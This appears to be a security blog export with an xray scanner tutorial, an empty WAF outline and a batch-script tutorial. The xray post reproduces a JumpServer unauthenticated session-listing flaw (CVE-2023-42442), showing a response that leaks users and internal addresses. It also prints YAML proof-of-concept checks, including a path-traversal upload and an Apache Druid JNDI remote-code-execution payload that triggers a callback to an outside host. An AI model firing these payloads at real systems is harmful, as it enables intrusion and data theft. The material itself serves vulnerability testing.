task</span><br><span class="line"> subdomain, sd Run a subdomain task</span><br><span class="line"> poclint, pl, lint lint yaml poc</span><br><span class="line"> burp-gamma, btg Convert the export file of burp historical proxy records to POC format</span><br><span class="line"> transform transform other script to gamma</span><br><span class="line"> reverse Run a standalone reverse server</span><br><span class="line"> convert convert results from json to html or from html to json</span><br><span class="line"> genca GenerateToFile CA certificate and key</span><br><span class="line"> upgrade check new version and upgrade self if any updates found</span><br><span class="line"> version Show version info</span><br><span class="line"> x A command that enables all plugins.</span><br><span class="line">You can customize new commands or modify the plugins enabled by a command in the configuration file.</span><br><span class="line"> help, h Shows a list of commands or help for one command</span><br><span class="line"></span><br><span class="line">GLOBAL OPTIONS:</span><br><span class="line"> --config FILE Load configuration from FILE (default: "config.yaml")</span><br><span class="line"> --log-level value Log level, choices are debug, info, warn, error, fatal</span><br><span class="line"> --help, -h show help</span><br><span class="line">[INFO] 2023-09-21 17:36:22 [default:entry.go:226] Loading config file from config.yaml</span><br></pre></td></tr></table></figure><p>Show the help for the webscan subcommand:</p><p><code>xray_windows_amd64.exe webscan --help</code></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">NAME:</span><br><span class="line"> webscan - Run a webscan task</span><br><span class="line"></span><br><span class="line">USAGE:</span><br><span class="line"> webscan [command options] [arguments...]</span><br><span class="line"></span><br><span class="line">OPTIONS:</span><br><span class="line"> --list, -l list plugins</span><br><span class="line"> --plugins value, --plugin value, --plug value specify the plugins to run, separated by ','</span><br><span class="line"> --poc value, -p value specify the poc to run, separated by ','</span><br><span class="line"> --level value specify the level of poc to run, separated by ','</span><br><span class="line"> --tags value specify the level of poc to run, separated by ','</span><br><span class="line"></span><br><span class="line"> --listen value use proxy resource collector, value is proxy addr, (example: 127.0.0.1:1111)</span><br><span class="line"> --basic-crawler value, --basic value use a basic spider to crawl the target and scan the requests</span><br><span class="line"> --browser-crawler value, --browser value use a browser spider to crawl the target and scan the requests</span><br><span class="line"> --url-file value, --uf value read urls from a local file and scan these urls, one url per line</span><br><span class="line"> --burp-file value, 
--bf value read requests from burpsuite exported file as targets</span><br><span class="line"> --url value, -u value scan a **single** url</span><br><span class="line"> --data value, -d value data string to be sent through POST (e.g. 'username=admin')</span><br><span class="line"> --raw-request FILE, --rr FILE load http raw request from a FILE</span><br><span class="line"> --force-ssl, --fs force usage of SSL/HTTPS for raw-request</span><br><span class="line"></span><br><span class="line"> --json-output FILE, --jo FILE output xray results to FILE in json format</span><br><span class="line"> --html-output FILE, --ho FILE output xray result to FILE in HTML format</span><br><span class="line"> --webhook-output value, --wo value post xray result to url in json format</span><br></pre></td></tr></table></figure><h1 id="CVE-2023-42442漏洞复现"><a href="#CVE-2023-42442漏洞复现" class="headerlink" title="CVE-2023-42442漏洞复现"></a>Reproducing CVE-2023-42442</h1><p>References: <a href="https://blog.csdn.net/holyxp/article/details/133066481">https://blog.csdn.net/holyxp/article/details/133066481</a></p><p><a href="https://www.secrss.com/articles/58981">https://www.secrss.com/articles/58981</a></p><p>Send the request from Burp. Note that it carries no Cookie or Authorization header: the point of the check is that the session list is served to a client that never authenticated.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET /api/v1/terminal/sessions/?limit=2 HTTP/1.1</span><br><span class="line">Host: example.com</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: en-US,en;q=0.5</span><br><span 
class="line">Accept-Encoding: gzip, deflate, br</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure><p>The response: HTTP 200 with the paginated session list (18168 sessions on this instance). Each entry exposes the user, asset, account, protocol and source address of a session to a caller that never authenticated.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Server: nginx</span><br><span class="line">Date: Thu, 21 Sep 2023 08:05:28 GMT</span><br><span class="line">Content-Type: application/json</span><br><span class="line">Content-Length: 1782</span><br><span class="line">Connection: close</span><br><span class="line">Vary: Accept, Accept-Language, Cookie</span><br><span class="line">Allow: GET, POST, PUT, PATCH, DELETE, HEAD, OPTIONS</span><br><span class="line">X-Frame-Options: DENY</span><br><span class="line">Content-Language: en</span><br><span class="line">X-Content-Type-Options: nosniff</span><br><span class="line">Referrer-Policy: same-origin</span><br><span class="line">Set-Cookie: SESSION_COOKIE_NAME_PREFIX=jms_; Path=/</span><br><span class="line"></span><br><span class="line">{"count":18168,"next":"http://example.com/api/v1/terminal/sessions/?limit=2&offset=2","previous":null,"results":[{"id":"4d2f4dfc-8332-46e1-a691-fe5dbe72fc63","user":"林([email 
protected])","asset":"林(10.15.168.113)","user_id":"70932e0f-5e36-4086-821a-ee453d01f39f","asset_id":"bac40e7c-27d9-4040-b4ad-b692576ac0c9","account":"@INPUT(ltc)","account_id":"4172edfc-4c65-43af-844d-ad729c98babd","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.4.215","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:04:36 +0800","date_end":null},{"id":"95f80041-4bda-45e5-a513-f4bc55385587","user":"郭([email protected])","asset":"郭(10.18.100.100)","user_id":"74b08df7-cadc-4e9b-a1b7-1dd6a53f0314","asset_id":"6dd5488f-bd7a-4731-817f-85217416a52c","account":"@INPUT(GW)","account_id":"98ab7554-e018-4f3d-b936-c1c9a37b62ab","protocol":"rdp","type":{"value":"normal","label":"Normal"},"login_from":{"value":"WT","label":"Web Terminal"},"remote_addr":"172.33.129.206","comment":null,"terminal":{"id":"f4bc8fa3-8ff2-4836-b0a0-17a07c314ce4","name":"[Lion]-centos-73bf114de44f"},"command_amount":0,"org_id":"00000000-0000-0000-0000-000000000002","org_name":"Default","is_success":true,"is_finished":false,"has_replay":false,"has_command":false,"can_replay":false,"can_join":true,"can_terminate":true,"date_start":"2023/09/21 16:03:41 +0800","date_end":null}]}</span><br></pre></td></tr></table></figure><h1 id="自定义POC演示"><a href="#自定义POC演示" class="headerlink" title="自定义POC演示"></a>Custom POC demo</h1><p>To run a single custom POC, use the command below: <code>--plugins phantasm</code> enables only the YAML POC engine, <code>--poc</code> points at the local POC file, and the two output flags write the HTML and JSON reports.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xray_windows_amd64.exe webscan --plugins phantasm --poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml 
--url http://example.com/ --html-output CVE-2023-42442.html --json-output CVE-2023-42442.json</span><br></pre></td></tr></table></figure><p>This is an unauthenticated access vulnerability in JumpServer (CVE-2023-42442). The POC is as follows.</p><p>The logic is simple: the rule describes the conditions checked against the server's response to one unauthenticated GET of <code>/api/v1/terminal/sessions/?limit=1</code>. It requires a 200 status code and a body containing the strings <code>"count":</code>, <code>"next":</code>, <code>"previous":</code> and <code>"results":</code>, the pagination keys seen in the response above. Taken together these decide whether the check fires. An instance that protects this endpoint does not answer an anonymous GET with a 200 and a paginated body (it rejects the request or redirects to the login page), and because <code>follow_redirects</code> is false a redirect cannot satisfy the rule.</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-jumpserver-session-replay-unauth</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">GET</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/api/v1/terminal/sessions/?limit=1</span></span><br><span class="line"> <span class="attr">follow_redirects:</span> <span class="literal">false</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">>-</span></span><br><span class="line"><span class="string"> response.status == 200 && </span></span><br><span class="line"><span class="string"> 
response.body_string.contains('"count":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"next":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"previous":') &&</span></span><br><span class="line"><span class="string"> response.body_string.contains('"results":')</span></span><br><span class="line"><span class="string"></span><span class="attr">expression:</span> <span class="string">r0()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">Chaitin</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span class="string">https://stack.chaitin.com/techblog/detail/156</span></span><br></pre></td></tr></table></figure><p>Run output:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">____ ___.________. ____. 
_____.___.</span><br><span class="line">\ \/ /\_ __ \ / _ \ \__ | |</span><br><span class="line"> \ / | _ _/ / /_\ \ / | |</span><br><span class="line"> / \ | | \/ | \ \____ |</span><br><span class="line">\___/\ \ |____| /\____|_ / / _____/</span><br><span class="line"> \_/ \_/ \_/ \/</span><br><span class="line"></span><br><span class="line">Version: 1.9.11/eb0c331d/COMMUNITY</span><br><span class="line"></span><br><span class="line">[INFO] 2023-09-21 17:03:17 [default:entry.go:226] Loading config file from config.yaml</span><br><span class="line"></span><br><span class="line">Enabled plugins: [phantasm]</span><br><span class="line"></span><br><span class="line">[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:114] found local poc .\POC\yaml-poc-fit2cloud-jumpserver-unauthorized_access-CVE-2023-42442.yml</span><br><span class="line">[INFO] 2023-09-21 17:03:18 [phantasm:phantasm.go:185] 1 pocs have been loaded (debug level will show more details)</span><br><span class="line">[INFO] 2023-09-21 17:03:18 [default:dispatcher.go:444] processing GET http://example.com/</span><br><span class="line">[Vuln: phantasm]</span><br><span class="line">Target "http://example.com/"</span><br><span class="line">VulnType "poc-yaml-jumpserver-session-replay-unauth/default"</span><br><span class="line">Author "Chaitin"</span><br><span class="line">Links ["https://stack.chaitin.com/techblog/detail/156"]</span><br><span class="line"></span><br><span class="line">[*] All pending requests have been scanned</span><br><span class="line">[*] scanned: 1, pending: 0, requestSent: 2, latency: 40.50ms, failedRatio: 0.00%</span><br><span class="line">[INFO] 2023-09-21 17:03:19 [controller:dispatcher.go:573] controller released, task done</span><br></pre></td></tr></table></figure><p>Finally, open the HTML report to see the details of the finding.</p><h1 id="POC编写指南"><a href="#POC编写指南" class="headerlink" title="POC编写指南"></a>POC writing guide</h1><p>How to write a high-quality POC: <a 
href="https://docs.xray.cool/#/guide/hiq/summary">https://docs.xray.cool/#/guide/hiq/summary</a></p><p>Rule lab: <a href="https://poc.xray.cool/">https://poc.xray.cool/</a></p><p>This tool makes it easy to generate a POC, and it can also lint a POC's format and check it for duplicates.</p><p>See the developer documentation for details: <a href="https://docs.xray.cool/#/guide/README">https://docs.xray.cool/#/guide/README</a></p><ul><li>Basic structure of a plugin: <a href="https://docs.xray.cool/#/guide/yaml/yaml_script_v2">https://docs.xray.cool/#/guide/yaml/yaml_script_v2</a></li><li>Plugin execution logic: <a href="https://docs.xray.cool/#/guide/yaml/yaml_run_logic">https://docs.xray.cool/#/guide/yaml/yaml_run_logic</a></li><li>POC template: <a href="https://docs.xray.cool/#/guide/yaml/yaml_poc_template">https://docs.xray.cool/#/guide/yaml/yaml_poc_template</a></li></ul><p>Community-contributed POCs: <a href="https://github.com/chaitin/xray/tree/master/pocs">https://github.com/chaitin/xray/tree/master/pocs</a></p><p>Two POC examples from the community repository. The first is a file-upload check: it uploads a file with random content and then fetches it back, so the rule only fires when the uploaded bytes are actually served. The second is an out-of-band RCE check: it plants a reverse-connection URL obtained from <code>newReverse()</code> in the request and fires only if <code>reverse.wait(5)</code> sees the callback, because success cannot be judged from the HTTP response alone.</p><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span 
class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-yonyou-chanjet-file-updoad</span></span><br><span class="line"><span class="attr">manual:</span> <span class="literal">true</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">set:</span></span><br><span class="line"> <span class="attr">randstr:</span> <span class="string">randomLowercase(60)</span></span><br><span class="line"> <span class="attr">rboundary:</span> <span class="string">randomLowercase(8)</span></span><br><span class="line"> <span class="attr">randname:</span> <span class="string">randomLowercase(6)</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">cache:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">POST</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/tplus/SM/SetupAccount/Upload.aspx?preload=1</span></span><br><span class="line"> <span class="attr">headers:</span></span><br><span class="line"> <span class="attr">Content-Type:</span> <span class="string">multipart/form-data;</span> <span class="string">boundary=----WebKitFormBoundary{{rboundary}}</span></span><br><span class="line"> <span class="attr">body:</span> <span class="string">"\</span></span><br><span class="line"><span class="string"> ------WebKitFormBoundary<span class="template-variable">{{rboundary}}</span>\r\n\</span></span><br><span class="line"><span class="string"> Content-Disposition: form-data; 
name=\"File1\"; filename=\"../../../img/login/<span class="template-variable">{{randname}}</span>.jpg\"\r\n\</span></span><br><span class="line"><span class="string"> Content-Type: image/jpeg\r\n\</span></span><br><span class="line"><span class="string"> \r\n\</span></span><br><span class="line"><span class="string"> <span class="template-variable">{{randstr}}</span>\r\n\</span></span><br><span class="line"><span class="string"> ------WebKitFormBoundary<span class="template-variable">{{rboundary}}</span>--\</span></span><br><span class="line"><span class="string"> "</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">response.status</span> <span class="string">==</span> <span class="number">200</span></span><br><span class="line"> <span class="attr">r1:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">cache:</span> <span class="literal">true</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">GET</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/tplus/img/login/{{randname}}.jpg</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">response.status</span> <span class="string">==</span> <span class="number">200</span> <span class="string">&&</span> <span class="string">response.body.bcontains(bytes(randstr))</span></span><br><span class="line"><span class="attr">expression:</span> <span class="string">r0()</span> <span class="string">&&</span> <span class="string">r1()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">Jarcis-cy</span></span><br><span class="line"> <span class="attr">links:</span></span><br><span class="line"> <span class="bullet">-</span> <span 
class="string">https://weibo.com/ttarticle/x/m/show/id/2309404807909669208397?_wb_client_=1</span></span><br><span class="line"> <span class="attr">vulnerability:</span></span><br><span class="line"> <span class="attr">id:</span> <span class="string">CT-475791</span></span><br><span class="line"> <span class="attr">level:</span> <span class="string">critical</span></span><br></pre></td></tr></table></figure><figure class="highlight yaml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span 
class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">name:</span> <span class="string">poc-yaml-apache-druid-kafka-rce</span></span><br><span class="line"><span class="attr">transport:</span> <span class="string">http</span></span><br><span class="line"><span class="attr">set:</span></span><br><span class="line"> <span class="attr">reverse:</span> <span class="string">newReverse()</span></span><br><span class="line"> <span class="attr">reverseRMI:</span> <span class="string">reverse.rmi</span></span><br><span class="line"><span class="attr">rules:</span></span><br><span class="line"> <span class="attr">r0:</span></span><br><span class="line"> <span class="attr">request:</span></span><br><span class="line"> <span class="attr">method:</span> <span class="string">POST</span></span><br><span class="line"> <span class="attr">path:</span> <span class="string">/druid/indexer/v1/sampler?for=connect</span></span><br><span class="line"> <span class="attr">follow_redirects:</span> <span class="literal">false</span></span><br><span class="line"> <span class="attr">headers:</span></span><br><span class="line"> <span class="attr">Content-Type:</span> <span class="string">application/json</span></span><br><span class="line"> <span class="attr">body:</span> <span class="string">|-</span></span><br><span class="line"><span class="string"> {</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span 
class="string"> "spec":{</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span class="string"> "ioConfig":{</span></span><br><span class="line"><span class="string"> "type":"kafka",</span></span><br><span class="line"><span class="string"> "consumerProperties":{</span></span><br><span class="line"><span class="string"> "bootstrap.servers":"6.6.6.6:9092",</span></span><br><span class="line"><span class="string"> "sasl.mechanism":"SCRAM-SHA-256",</span></span><br><span class="line"><span class="string"> "security.protocol":"SASL_SSL",</span></span><br><span class="line"><span class="string"> "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"{{reverseRMI}}\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "topic":"any",</span></span><br><span class="line"><span class="string"> "useEarliestOffset":true,</span></span><br><span class="line"><span class="string"> "inputFormat":{</span></span><br><span class="line"><span class="string"> "type":"regex",</span></span><br><span class="line"><span class="string"> "pattern":"([\\s\\S]*)",</span></span><br><span class="line"><span class="string"> "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",</span></span><br><span class="line"><span class="string"> "columns":[</span></span><br><span class="line"><span class="string"> "raw"</span></span><br><span class="line"><span class="string"> ]</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "dataSchema":{</span></span><br><span class="line"><span class="string"> "dataSource":"sample",</span></span><br><span class="line"><span class="string"> "timestampSpec":{</span></span><br><span 
class="line"><span class="string"> "column":"!!!_no_such_column_!!!",</span></span><br><span class="line"><span class="string"> "missingValue":"1970-01-01T00:00:00Z"</span></span><br><span class="line"><span class="string"> },</span></span><br><span class="line"><span class="string"> "dimensionsSpec":{</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"granularitySpec"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"rollup"</span><span class="string">:false</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"tuningConfig"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"type"</span><span class="string">:"kafka"</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">},</span></span><br><span class="line"> <span class="string">"samplerConfig"</span><span class="string">:{</span></span><br><span class="line"> <span class="string">"numRows"</span><span class="string">:500,</span></span><br><span class="line"> <span class="string">"timeoutMs"</span><span class="string">:15000</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="string">}</span></span><br><span class="line"> <span class="attr">expression:</span> <span class="string">reverse.wait(5)</span></span><br><span class="line"><span class="attr">expression:</span> <span class="string">r0()</span></span><br><span class="line"><span class="attr">detail:</span></span><br><span class="line"> <span class="attr">author:</span> <span class="string">chaitin</span></span><br></pre></td></tr></table></figure>]]></content>
<categories>
<category> Vulnerabilities </category>
</categories>
<tags>
<tag> Security </tag>
<tag> Vulnerabilities </tag>
</tags>
</entry>
<entry>
<title>WAF</title>
<link href="/2023/06/23/waf/"/>
<url>/2023/06/23/waf/</url>
<content type="html"><![CDATA[<h1 id="WAF概念介绍"><a href="#WAF概念介绍" class="headerlink" title="WAF概念介绍"></a>Introduction to WAF concepts</h1><h2 id="WAF概念"><a href="#WAF概念" class="headerlink" title="WAF概念"></a>WAF concept</h2><h2 id="WAF的产品形态"><a href="#WAF的产品形态" class="headerlink" title="WAF的产品形态"></a>WAF product forms</h2><h2 id="WAF部署模式"><a href="#WAF部署模式" class="headerlink" title="WAF部署模式"></a>WAF deployment modes</h2><h1 id="开源WAF"><a href="#开源WAF" class="headerlink" title="开源WAF"></a>Open-source WAFs</h1>]]></content>
<categories>
<category> Security </category>
</categories>
<tags>
<tag> Security </tag>
<tag> WAF </tag>
</tags>
</entry>
<entry>
<title>Several ways to install a certificate in Firefox</title>
<link href="/2023/06/07/firefox-and-bat/"/>
<url>/2023/06/07/firefox-and-bat/</url>
<content type="html"><![CDATA[<h1 id="Firefox安装证书的几种方式"><a href="#Firefox安装证书的几种方式" class="headerlink" title="Firefox安装证书的几种方式"></a>Several ways to install a certificate in Firefox</h1><p>Several ways to install a certificate in Firefox.</p><h2 id="关于bat脚本"><a href="#关于bat脚本" class="headerlink" title="关于bat脚本"></a>About bat scripts</h2><h3 id="bat脚本中的变量类型"><a href="#bat脚本中的变量类型" class="headerlink" title="bat脚本中的变量类型"></a>Variable types in bat scripts</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">@echo off</span><br><span class="line">rem Enable delayed expansion so the exclamation-mark variable reference inside the block below reads the updated value</span><br><span class="line">setlocal EnableDelayedExpansion</span><br><span class="line"></span><br><span class="line">set regPath=HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion</span><br><span class="line">set regKey=ProgramFilesDir</span><br><span class="line">set regValue= </span><br><span class="line">set Value1="ww"</span><br><span class="line"></span><br><span class="line">rem Check that the key exists; the output is discarded and only the exit code is used</span><br><span class="line">reg query %regPath% >nul 2>nul</span><br><span class="line">if %errorlevel%==0 (</span><br><span class="line"> echo Registry key %regPath% exists.</span><br><span class="line"> rem tokens=2* puts the value type in the first token variable and the remaining text, the data, in the second</span><br><span class="line"> for /f "tokens=2*" %%a in ('reg query %regPath% /v %regKey% ^| findstr /i %regKey%') do (</span><br><span class="line"> if "%regValue%"=="" (</span><br><span class="line"> echo value not exists</span><br><span class="line"> ) else (</span><br><span class="line"> set Value1=%%b</span><br><span class="line"> echo %%b</span><br><span class="line"> echo !Value1! 1</span><br><span class="line"> ) </span><br><span class="line"> )</span><br><span class="line">) else (</span><br><span class="line"> echo Registry key %regPath% does not exist.</span><br><span class="line">)</span><br></pre></td></tr></table></figure>
<p>In this example script, the <code>set</code> command first gives the variable <code>Value1</code> the initial value <code>"ww"</code>. The script then uses <code>reg query</code> to check whether the specified registry key exists; if it does, it uses <code>for /f</code> over the output of <code>reg query</code> to parse the registry value's name and data and stores the data in <code>Value1</code>. Finally, the script prints the value of <code>Value1</code> followed by the extra string <code>1</code>.</p><p>Note that when printing <code>Value1</code> with <code>echo</code>, the variable name must be wrapped in <code>%</code> characters; otherwise the output is the variable name itself rather than the value it holds. Also, <code>Value1</code> is assigned inside the <code>if</code> block, so within that block <code>!</code> must be used instead of <code>%</code> to enable delayed variable expansion; only then is the value of <code>Value1</code> referenced correctly inside the block.</p><p>At first I used <code>%%</code> to print the variable's value and found the result did not match what I expected; the almighty GPT corrected this mistake for me.</p><p>On referencing variables:</p><p>In Windows batch scripts there are two ways to reference a variable's value: <code>%var%</code> and <code>!var!</code>. The main difference between them is how the variable is expanded and its lifetime.</p><p><code>%var%</code> denotes immediate expansion, also called a percent variable. In a batch script, <code>%var%</code> expands the variable to its current value. Variables are valid for the whole lifetime of the batch script, but in some situations they may not expand as expected. For example, if a variable is used inside a code block and was changed before that block, the percent variable may expand to the old value rather than the new one.</p><p><code>!var!</code> denotes delayed expansion, also called an exclamation-mark variable. In a batch script, <code>!var!</code> likewise expands the variable to its current value, but the expansion happens at run time rather than at parse time, so the variable's lifetime is limited to the code block in which it is used. If a variable is needed inside a code block and was changed before that block, the exclamation-mark variable ensures it expands to its current value.</p><p>In a batch script, the <code>setlocal enabledelayedexpansion</code> command enables exclamation-mark variables. Once delayed expansion is enabled, <code>!var!</code> can be used to reference a variable's value.</p><p>So <code>%%</code> stands for percent variables and <code>!!</code> for exclamation-mark variables: in a batch script, use <code>%%</code> to reference the value of a percent variable and <code>!!</code> to reference the value of an exclamation-mark variable.</p>
<h3 id="脚本闪退怎么办"><a href="#脚本闪退怎么办" class="headerlink" title="脚本闪退怎么办"></a>What to do when the script window closes immediately</h3><p>If the window closes right after the script starts, one of its commands has probably failed. Try adding a <code>pause</code> command at the end of the script so it pauses after finishing, letting you read the output and any error messages.</p><p>If you want to see the error messages when the script fails, comment out the <code>@echo off</code> command; the script will then print each command together with its result and error messages as it runs.</p><p>You can also run the script from a command prompt instead of double-clicking the file; if it fails, the error message stays in the console until you close the window yourself.</p><p>Finally, if you still cannot find the problem, comment out the script's commands one at a time until you find the one that causes it.</p>
